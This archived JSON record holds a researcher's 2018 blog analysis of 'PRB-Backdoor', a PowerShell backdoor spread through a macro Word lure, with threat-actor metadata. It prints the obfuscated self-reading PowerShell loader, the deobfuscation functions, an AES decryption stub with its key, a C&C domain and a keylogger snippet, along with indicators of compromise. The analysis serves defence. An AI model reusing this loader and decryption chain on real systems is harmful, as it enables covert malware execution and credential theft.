{
	"id": "76e9bcaf-d0cb-4b80-a842-9d8f0ffa6613",
	"created_at": "2026-04-06T00:10:51.517843Z",
	"updated_at": "2026-04-10T03:34:22.588472Z",
	"deleted_at": null,
	"sha1_hash": "fb5bbd3ab91b485ceb51965bcf02d5e066b28ccc",
	"title": "PRB-Backdoor - A Fully Loaded PowerShell Backdoor with Evil Intentions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 230878,
	"plain_text": "PRB-Backdoor - A Fully Loaded PowerShell Backdoor with Evil Intentions\r\nBy Mo Bustami\r\nPublished: 2018-05-12 · Archived: 2026-04-05 14:39:10 UTC\r\nINTRODUCTION\r\nThe great people at ClearSky reached out to me a couple of days ago regarding a sample that they suspected could be related to MuddyWater.\r\nThey suspected so because the sample had some similarities with the way MuddyWater lures look and some similarities in the PowerShell obfuscation, specifically the character substitution routine.\r\n[Figure: MuddyWater sample]\r\n[Figure: New sample]\r\nHowever, after analyzing the sample and investigating it further, I was able to show that this is indeed something different, but nonetheless interesting. This blog post is a walkthrough of my analysis and highlights initial insights into this potential attack.\r\nTHE SAMPLE - FROM AIRMILES TO MACRO CODE TO POWERSHELL\r\nThe sample that was shared with me is a macro-laced Word document called \"Egyptairplus.doc\" with an MD5 hash of fdb4b4520034be269a65cfaee555c52e. The macro code contains a function called Worker() which calls multiple other functions embedded in the document to ultimately run a PowerShell command:\r\n\"powershElL -EXEC bypASS -COmMaND \"\u0026 {$pth='\\Document1';$rt='';$Dt=geT-cOntEnt -patH $PTH -eNcoDInG aSCIi;FOrEach($I in $DT){iF ($I.Length -Gt 7700){$rt='';$Dt=geT-cOntEnt -patH $PTH -eNcoDInG aSCIi;FOrEach($I in $DT){iF ($I.Length -Gt 7700){$rt=$i.sPLIt('**')[2];BREak}};$rt=[syStEm.TExT.eNCODing]::asCII.gEtsTrIng([sysTEm.ConverT]::FROmbaSe64sTriNG($rT));IEX($RT);\r\nThis command reads the document itself, looks for a line longer than 7700 characters, splits that line on \"**\" to extract the embedded chunk of data, and then Base64-decodes and executes it. 
The result is a PowerShell script that looks like this:\r\nhttps://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html\r\nPage 1 of 6\n\nfunction main\r\n{\r\n$content=\"ZnVuY3Rpb24gejB3MnVQZVgoJHNLUHYpewogICAgJHNLUHYgPSAkc0tQdi5Ub0NoYXJBcnJheSgpCiAgICBbYXJyYXldOjpSZXZlcnNlKCR\r\n...\r\n...\r\n...\r\n... Truncated code...\r\n2ZhbHNlIiwgMCkp\"\r\n    [string]$decode = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($content))\r\n    iex $decode\r\n}\r\nmain\r\nReplacing iex with Write-Output and running this code will result in a second-layer PowerShell script that is shown earlier in the blog and has similarities with MuddyWater code due to the use of the character substitution functions. Below is a snippet of the code:\r\nfunction z0w2uPeX($sKPv){\r\n    $sKPv = $sKPv.ToCharArray()\r\n    [array]::Reverse($sKPv)\r\n    $G8JdH = -join($sKPv)\r\n    return $G8JdH\r\n    }\r\nfunction FQdZ7EqW($fpuD){\r\n    $fpuD = $fpuD.Replace('#a#', \"`n\").Replace('#b#', '\"').Replace('#c#', \"'\").Replace('#d#', \"$\").Replace('#e#', \"``\")\r\n    return $fpuD\r\n    }\r\niex(FQdZ7EqW(\"{4}{5}{6}{1}{2}{0}{3}\" -f (z0w2uPeX(\"1 sd\")),\"Se\",\"con\",\"0\",\"S\",\"tart-Slee\",(z0w2uPeX(\"- p\")), 0))\r\niex(FQdZ7EqW(\"{2}{1}{5}{0}{4}{3}\" -f (z0w2uPeX(\" yeWs60\")),(z0w2uPeX(\"ob\")),\"[\",\"e\",(z0w2uPeX(\"urT#d#=\")),\"ol]#d#gS\", 0))\r\nz0w2uPeX reverses a string and FQdZ7EqW substitutes the #a#..#e# markers back into newline, quote, apostrophe, dollar and backtick characters; the two iex lines above reassemble to Start-Sleep -Seconds 10 and [bool]$gS06sWey =$True. Once you replace all the iex calls with Write-Output you will end up with more readable code, as shown below.\r\nThis code still contains encoded chunks of data. 
Two interesting pieces are Invoker.ps1 and js.hta.\r\nThe Invoker.ps1 script is used to decrypt the main backdoor code, as shown below:\r\n$nxUHOcAE = \"0ef4b1acb4394766\" #This is the key used to decrypt the main backdoor code\r\n$xWCWwEep = \"{path}\"\r\n[string]$BJgVSQMa = Get-Content -Path $xWCWwEep -Force\r\n$nl3hMTam = new-object system.security.cryptography.RijndaelManaged\r\n$nl3hMTam.Mode = [System.Security.Cryptography.CipherMode]::ECB\r\n$nl3hMTam.Padding = [System.Security.Cryptography.PaddingMode]::Zeros\r\n$nl3hMTam.BlockSize = 128\r\n$nl3hMTam.KeySize = 128\r\n$nl3hMTam.Key = [System.Text.Encoding]::UTF8.GetBytes($nxUHOcAE)\r\n$W9NYYLlk = [System.Convert]::FromBase64String($BJgVSQMa)\r\n$Oj5PebcQ = $nl3hMTam.CreateDecryptor();\r\n$mL9fRirD = $Oj5PebcQ.TransformFinalBlock($W9NYYLlk, 0, $W9NYYLlk.Length);\r\n[string]$Pru8pJC5 = [System.Text.Encoding]::UTF8.GetString($mL9fRirD).Trim('*')\r\nWrite-Output $Pru8pJC5 #I replaced iex with Write-Output\r\nwhile($true){\r\nstart-sleep -seconds 3\r\n}\r\nThe payload file is Base64-decoded and then decrypted with Rijndael using a 128-bit block and key (i.e. AES-128) in ECB mode with zero padding, keyed directly by the 16-character ASCII string above. When the encrypted backdoor code is passed through this script it is decrypted into the full-fledged backdoor code. I am sharing a snippet of the code here as the full code of the backdoor is over 2000 lines when properly formatted.\r\nNotice the main function name PRB, hence the name I have given it: \"PRB-Backdoor\".\r\nPOTENTIAL COMMAND \u0026 CONTROL\r\nRunning the sample in a sandbox did not show any network communication. 
However, during the analysis of the code I noticed early on a variable with the value $hash.httpAddress = \"http://outl00k[.]net\". This looks like the main domain that the backdoor communicates with for all of its different functions.\r\nPassive DNS and WHOIS lookups give additional information on the domain:\r\nDomain Name: outl00k.net\r\nRegistrar WHOIS Server: whois.joker.com\r\nRegistrar URL: http://joker.com/\r\nUpdated Date: 2018-04-25T03:32:22Z\r\nCreation Date: 2018-01-01T11:35:58Z\r\nRegistrant Name: Simon Nitoo\r\nRegistrant Street: Tehran\r\nRegistrant City: Tehran\r\nRegistrant State/Province: Tehran\r\nRegistrant Postal Code: 231423465\r\nRegistrant Country: IR\r\nRegistrant Phone: +98.2189763584\r\nRegistrant Email: simon.nitoo@chmail.ir\r\nRegistry Admin ID:\r\nAdmin Name: Simon Nitoo\r\nAdmin Street: Tehran\r\nAdmin City: Tehran\r\nAdmin State/Province: Tehran\r\nAdmin Postal Code: 231423465\r\nAdmin Country: IR\r\nAdmin Phone: +98.2189763584\r\nAdmin Email: simon.nitoo@chmail.ir\r\nRegistry Tech ID:\r\nTech Name: Simon Nitoo\r\nTech Street: Tehran\r\nTech City: Tehran\r\nTech State/Province: Tehran\r\nTech Postal Code: 231423465\r\nTech Country: IR\r\nTech Phone: +98.2189763584\r\nTech Email: simon.nitoo@chmail.ir\r\nName Server: ns1.outl00k.net\r\nName Server: ns2.outl00k.net\r\nThe registrant email address is also used for another domain, LinLedin[.]net.\r\nBoth domains are currently resolving to the following IP addresses:\r\noutl00k[.]net - 74.91.19[.]118 up until May 10, 2018\r\nLinLedin[.]net - 5.160.124[.]99 on April 30, 2018\r\nAs of the writing of this blog, there doesn't seem to be much information about either of those domains. 
\r\nPRB-BACKDOOR FUNCTIONALITY - AN EARLY LOOK\r\nI have yet to go through the whole code of the backdoor; however, below is an initial look at its functionality based on initial analysis.\r\nPRB-Backdoor has the following functions:\r\nPRB-CREATEALIVE and PRB-CREATEINTRODUCE - these two functions seem to be related to initial communication and registration with the C\u0026C\r\nPRB-HISTORY is a function that looks to grab the browsing history from different browsers including Chrome, IE and Firefox. It utilizes a sub-function called GET-HISTORY\r\nPRB-PASSWORD\r\nPRB-WRITEFILE\r\nPRB-READFILE\r\nPRB-FUNCTUPDATE\r\nPRB-SHELL\r\nPRB-LOGGER\r\nSNAP - takes a screenshot of the screen\r\nsysinfo - gets the system info\r\nAnd many more functions.\r\nAt some point in the code there are even what seem to be .NET/C# code snippets; the constants in the snippet below are the Windows low-level keyboard hook identifier (WH_KEYBOARD_LL) and key-down/key-up window messages, which is consistent with keystroke logging:\r\n  $dsc = @\"\r\nusing System;\r\nusing System.IO;\r\nusing System.Diagnostics;\r\nusing System.Runtime.InteropServices;\r\nusing System.Windows.Forms;\r\nusing System.Text;\r\nnamespace dDumper\r\n{\r\n    public static class Program\r\n    {\r\n        private const int WH_KEYBOARD_LL = 13;\r\n        private const int WM_KEYDOWN = 0x0100;\r\n        private const int WM_SYSTEMKEYDOWN = 0x0104;\r\n        private const int WM_KEYUP = 0x0101;\r\n        private const int WM_SYSTEMKEYUP = 0x0105;\r\nFINAL THOUGHTS\r\nPRB-Backdoor seems to be a very interesting piece of malware that is designed to run on the victim machine and gather information, steal passwords, log keystrokes and perform many other functions. I could not find any reference to the backdoor or its code in any public source.\r\nI would imagine there are other lures and samples out there, and hopefully other researchers will be able to dive deeper into the code and reveal additional details. 
I will do so as soon as I have additional time, but I thought it would be beneficial to share these initial findings in the hope of shedding some light on this activity.\r\nINDICATORS OF COMPROMISE\r\nfdb4b4520034be269a65cfaee555c52e (MD5 of Egyptairplus.doc)\r\noutl00k[.]net (C\u0026C domain)\r\nLinLedin[.]net (domain sharing the registrant email)\r\n74.91.19[.]118 (outl00k[.]net)\r\n5.160.124[.]99 (LinLedin[.]net)\r\nSource: https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html"
	],
	"report_names": [
		"prb-backdoor-fully-loaded-powershell.html"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434251,
	"ts_updated_at": 1775792062,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fb5bbd3ab91b485ceb51965bcf02d5e066b28ccc.pdf",
		"text": "https://archive.orkl.eu/fb5bbd3ab91b485ceb51965bcf02d5e066b28ccc.txt",
		"img": "https://archive.orkl.eu/fb5bbd3ab91b485ceb51965bcf02d5e066b28ccc.jpg"
	}
}